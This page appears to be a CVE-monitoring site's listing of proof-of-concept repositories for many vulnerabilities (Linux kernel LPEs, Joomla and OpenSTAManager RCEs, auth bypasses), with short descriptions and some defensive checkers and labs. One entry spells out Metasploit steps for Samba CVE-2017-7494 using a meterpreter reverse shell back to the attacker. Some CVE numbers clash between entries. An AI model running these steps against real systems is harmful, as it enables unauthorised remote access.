Schema.org has a cross-site scripting (XSS) vulnerability via script break-out in toScript() output.
PoC: CVE-2026-6307
Google Chrome CVE-2026-6307 PoC
PoC: root-sonim-xp3800
app that ports CVE-2019-2215 to arm32 and mounts a su binary to /sbin with denylist + root app installer. firehose/Magisk guide included
PoC: CVE-2026-34835-Black-box-Analysis
A black-box (DAST) security analysis of CVE-2026-34835 focusing on external validation methodology, observable behavior, security impact, and defensive recommendations.
PoC: Linux-Kernel-Vulnerabilities-CVE-2026-23111
High Severity LPE vulnerability in Linux Kernel, with a CVS score of 7.8. An inverted check from user enables a process inside the container to break out of the sandbox along with full root privileges on user PC. I have been investigating about this vulnerability and has a lightweight script that runs in the terminal to check if you are vulnerable.
PoC: xperia_5_bl_unlocker_poc
My take on unlocking Xperia 5 SO-01M for p42 bootloader using CVE-2021-1931
PoC: cve-2026-23111-poc
scuffed PoC for CVE-2026-23111. Made and ran on Linux Kernel 6.12.69
PoC: CVE_ADC_IOC_2026
Citrix NetScaler CVE Preconditions Checker as per CTX696604 | Supported CVE : CVE-2026-8451, CVE-2026-8452, CVE-2026-8655, CVE-2026-10816, CVE-2026-10817, and CVE-2026-13474
PoC: CVE-2026-46300
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit
PoC: CVE-2025-69212-PoC
OpenSTAManager v2.9.8 and earlier versions contain a critical OS Command Injection vulnerability in the P7M (signed XML) file decoding function.
PoC: CVE-2026-24418
OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module.
PoC: CVE-2026-69212
Python poc, exploit for CVE-2025-69212
PoC: CVE-2026-49468-LiteLLM-Auth-Bypass
CVE-2026-49468 — LiteLLM (<1.84.0) unauthenticated auth bypass via Host-header route confusion. PoC + docker lab.
PoC: CVE-2026-28995
# CVE-2026-28995 Proof of Concept for CVE-2026-28995 — Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.
PoC: Advanced-CVE-2026-53753
Crawl4AI is an open-source LLM friendly web crawler & scraper. Prior to 0.8.7, the _safe_eval_expression() function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore.
PoC: opensource_defect_repare_cc
Redis 7.0.0 核心模块重构与漏洞修复交付(重构 sds/adlist/intset/listpack,相似度≤20%;修复 CVE-2023-25155/28856、CVE-2024-31449、CVE-2022-36021、CVE-2022-31144 等漏洞)
PoC: opensource_defect_repair_cc
Redis 7.0.0 核心模块重构与漏洞修复交付(重构 sds/adlist/intset/listpack,相似度≤20%;修复 CVE-2023-25155/28856、CVE-2024-31449、CVE-2022-36021、CVE-2022-31144 等漏洞)
PoC: CVE-2026-56782
Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.
PoC: CVE-2026-54477
CVE-2026-54477: Admin Panel Missing Security Headers (clickjacking/XSS) - Gardyn (ICSA-26-183-03)
PoC: CVE-2026-55726
CVE-2026-55726: Publicly Listable Azure Blob Storage Container (device logs) - Gardyn (ICSA-26-183-03)
PoC: CVE-2026-52217-VTEX-Checkout-CrossTenant-IDOR
The VTEX Checkout Service exposes OrderForm data through the endpoints `/api/checkout/pub/orderForm/{orderFormId}` and `/attachments/*`. These endpoints do not validate the tenant (store account) of the authenticated session against the ownership of the requested OrderForm.
PoC: CVE-2026-13768
CVE-2026-13768: Privileged iothubowner IoT Hub credential — fleet enumeration, device RCE, home-network pivot — Gardyn (ICSA-26-183-03)
PoC: Code-27-Companion-Hub-Exploits
Proof of concept for CVE-2026-36027 and CVE-2026-36028
PoC: CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC
This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE).
PoC: CVE-2025-57819
CVE-2025-57819 - FreePBX Unauthenticated Remote Code Execution (RCE)
PoC: CVE-2026-48558
SimpleHelp OIDC Authentication Bypass PoC
PoC: Vulnerability-scanner
DESIGN AND IMPLEMENTATION OF A VULNERABILITY SCANNER FOR CVE-2026-45498 IN MICROSOFT DEFENDER
PoC: CVE-2026-33017
Python POC, Exploit for CVE-2026-33017
PoC: CVE-2021-27877-PoC
A modified version of the Rapid7 Metasploit module for CVE-2021-27877 that supports direct command execution for reliable vulnerability validation. Includes documentation explaining the exploit workflow, the module modifications, and usage examples.
PoC: CVE-2026-30784-rustdesk-poc
CVE-2026-30784: RustDesk hbbs Traffic Amplification PoC & PCAP Analysis
PoC: CVE-2026-52813
Gogs has Path Traversal in organization name that results in RCE through Git hooks
PoC: CVE-2026-53753
Crawl4AI <= 0.8.6 pre-auth RCE via AST sandbox escape (gi_frame.f_back.f_builtins chain) — CVSS 10.0
PoC: CVE-2025-69212
CVE-2025-69212 Proof-of-concept.
PoC: OpenSTAManager_RCE_Exploit-CVE-2026-38751-
OpenSTAManager RCE Exploit (CVE-2026-38751)
PoC: CVE-2025-69212-PoC
CVE-2025-69212 - OpenSTAManager OS Command Injection PoC
PoC: F5-BIG-IP
O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.
PoC: CVE-2026-6307-Longinus
CVE-2026-6307 PoC: Longinus - 2 Boundaries in One Bug https://nebusec.ai/research/v8-cve-2026-6307-writeup/)
PoC: CVE-2026-48907
CVE-2026-48907 PoC
PoC: CVE-2026-43735
Safari 跨域信息读取
PoC: cve-2025-24054-lab
Blue-team lab: detecting & mitigating CVE-2025-24054 (Windows NTLM hash disclosure) with Sysmon, Wazuh SIEM, and Group Policy
PoC: CVE-2026-42945
A flaw was found in NGINX, specifically within the ngx_http_rewrite_module. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests under specific rewrite configurations. This can lead to a heap buffer overflow in the NGINX worker process, which may result in arbitrary code execution
PoC: CVE-2026-51947-Advisory
Pivotal CRM's patch for an initial deserialization vulnerability was incomplete. The fix switched from BinaryFormatter to JSON.NET but left TypeNameHandling set to 4 without implementing SerializationBinder, allowing attackers to execute arbitrary code through malicious $type payloads. Fixed in 6.6.5.10 and Patch_CWE502_20260316.zip
PoC: CVE-2026-46331
pedit COW
PoC: Incident-Response-Report-TeamCity-Compromise-CVE-2024-27198-
CyberDefenders JetBrains Lab
PoC: CVE-2026-55488
motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
PoC: CVE-2026-58138-Conductor-Unauth-RCE
CVE-2026-58138 — Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator (HostAccess.ALL). Lab + PoC, verified e2e (root).
PoC: CVE-2026-46490-samlify-SAML-Attribute-Injection
CVE-2026-46490 — samlify <2.13.0 SAML AttributeValue XML injection -> signed-assertion privilege escalation. Self-contained PoC, verified e2e.
PoC: CVE-2025-40271
CVE-2025-40271 Modifed By MadEploits
PoC: cve-2026-46331-pedit-cow-auditd-detection
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
PoC: cve-2015-1187-dir820l-reproduction
Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.
PoC: CVE-2012-1823
CVE-2012-1823 - PHP CGI Argument Injection Remote Code Execution (RCE)
PoC: CVE-2026-22557-Path-Traversal-Ubiquti-UniFi
CVE-2026-22557 Path Traversal Ubiquti UniFi Network Application
PoC: CVE-2026-48907
POC for CVE-2026-48907
PoC: CVE-2026-49869
Kestra Auth-Bypass Vulnerability Checker
PoC: CVE-2026-31694-POC
Linux kernel FUSE readdir cache out-of-bounds write (CVE-2026-31694): a malicious FUSE server overflows a page-cache page by 24 bytes. PoC plus an unprivileged local-root exploit via /etc/passwd page-cache corruption. Run only inside a VM.
PoC: IS
Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju
PoC: CVE-2026-46331
Chequeo y Fix de la vulnerabilidad "pedit COW"
PoC: CVE-2025-45422---Bbox
CVE-2025-45422: Proximus b-box UPnP Persistence & Access Control Bypass
PoC: CVE-2026-10580
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
PoC: CVE-2026-56121-Feast-Unauth-RCE
CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.
PoC: CVE-2026-46817
CVE-2026-46817 - Draft
PoC: CVE-2026-8037
CVE-2026-8037 - Draft
PoC: CVE-2026-27626-PoC
OliveTin is a self-hosted web UI for exposing predefined shell commands to end users. This repository contains a proof-of-concept demonstrating two independent OS command injection vectors in OliveTin's Shell mode execution path, both of which bypass the application's intended shell-argument safety checks.
PoC: cve-2024-31317
Detailed discussion of Zygote vulnerability CVE-2024-31317
PoC: CVE-2026-43700
https://support.apple.com/en-us/127685#:~:text=2026%2D43704%3A%20dr3dd-,WebKit,-Available%20for%3A%20macOS
PoC: CVE-2026-44789-n8n-PrototypePollution-RCE
CVE-2026-44789 — n8n <1.123.43 HTTP Request pagination prototype pollution to RCE (NODE_OPTIONS runner-spawn gadget). Lab + automated PoC, verified e2e.
PoC: CVE-2023-43364-Searchor-RCE-Exploit
POC exploit via unsafe `eval()` usage in Searchor (≤ 2.4.2)
PoC: CVE-2026-46817
CVE-2026-46817
PoC: cve-2026-46331-audit
cve-2026-46331-audit script
PoC: CVE-2026-56782-Gorse-Auth-Bypass
CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e.
PoC: cve-2026-0000-reference
NIST CVE-2026-0000 Keylogger Analysis
PoC: CVE-2026-48907
CVE-2026-48907 – Joomla JCE Unauthenticated Remote Code Execution (RCE)
PoC: CVE-2026-53753-Crawl4AI-RCE
CVE-2026-53753 — Crawl4AI <0.8.7 unauthenticated RCE (AST sandbox escape via gi_frame.f_back). Lab + PoC, verified e2e.
PoC: cve-2023-4911-exploit-optimized
Pure C exploit for CVE-2023-4911 (Looney Tunables). No Python required. Features multi-processing brute-forcing, dynamic calibration, and integrated ELF parser.
PoC: CVE_2024_1086_vulnerability_check
CVE-2024-1086 vulnerability
PoC: CVE-2026-43503
DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503
PoC: cve-2026-9082-drupal
drupal-postgresql-rce
PoC: graylog-cve-2024-24824-exploit
Proof-of-concept exploit for CVE-2024-24824 demonstrating how an arbitrary class loading primitive can be transformed into remote code execution on vulnerable Graylog deployments.
PoC: CVE-2026-55200
CVE-2026-55200 - Critical libssh2 Remote Code Execution Vulnerability
PoC: By-Poloss..-..CVE-2026-48939
iCagenda Unauthenticated File Upload to RCE
PoC: cve-2025-0133
CVE-2025-0133 Scanner | Palo Alto GlobalProtect XSS Checker
PoC: CVE-2026-22226
Proof of Concept for the CVE-2026-22226
PoC: CVE-2026-20253
POC for CVE-2026-20253
PoC: Joomla_CVE_2026_48907
cve-2026-48907 scanner
PoC: DirtyClone
Python Proof of Concept for DirtyClone (CVE-2026-43503) - Linux kernel LPE via page-cache corruption
PoC: WiseDelete
Windows utility that demonstrates user-mode interaction with the vulnerable WiseDelfile64.sys driver and uses CVE-2025-66680 to perform kernel-assisted file deletion.
PoC: CVE-2025-55182-React2Shell-RCE
React2Shell (CVE-2025-55182) PoC
PoC: CVE-2026-48908
Unauthenticated RCE PoC for CVE-2026-48908 SP Page Builder (Joomla) arbitrary file upload and remote code execution exploit with mass scaning support.
PoC: WiseDelete
A lightweight Windows utility demonstrating user-mode interaction with the vulnerable WiseDelfile64.sys driver using CVE-2025-66680 to perform kernel-assisted file deletion.
PoC: CVE-2026-23918-Double-free-Apache-httpd-mod_http2
Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE
PoC: CVE-2018-18778
CVE-2018-18778 - ACME mini_httpd Arbitrary File Read
PoC: CVE-2023-0386-OverlayFS
Copy fake in-memory files to disk using overlayFS
PoC: CVE-2026-49048-JoomCCK-SQLi
CVE-2026-49048 — JoomCCK 6.4.0 Unauthenticated SQL Injection (CVSS 9.8)
PoC: crypto-lab-merkle-proofs
Browser-based Merkle tree demo — build a tree, generate inclusion proofs, recompute the root hash by hash, and replay the RFC 6962 second-preimage and CVE-2012-2459 attacks. Real SHA-256. No backend.
PoC: react2shell-exploit
React2Shell: CVE-2025-55182
PoC: CVE-2026-12485
CVE-2026-12485
PoC: DevHub-HTB-Walkthrough
Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escalation)
PoC: CVE-2026-41179
POC for CVE-2026-41179
PoC: dirtyclone-exploit
CVE-2026-46331 — Linux Kernel Local Privilege Escalation TC pedit + IPsec TEE Page Cache Corruption · Affected kernels: ≤ 6.12.9
PoC: CVE-2026-27654
Обзор n-day уязвимости на русском языке.
PoC: CVE-2026-41940-PoC
CVE-2026-41940 authentication bypass vulnerability proof-of-concept
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free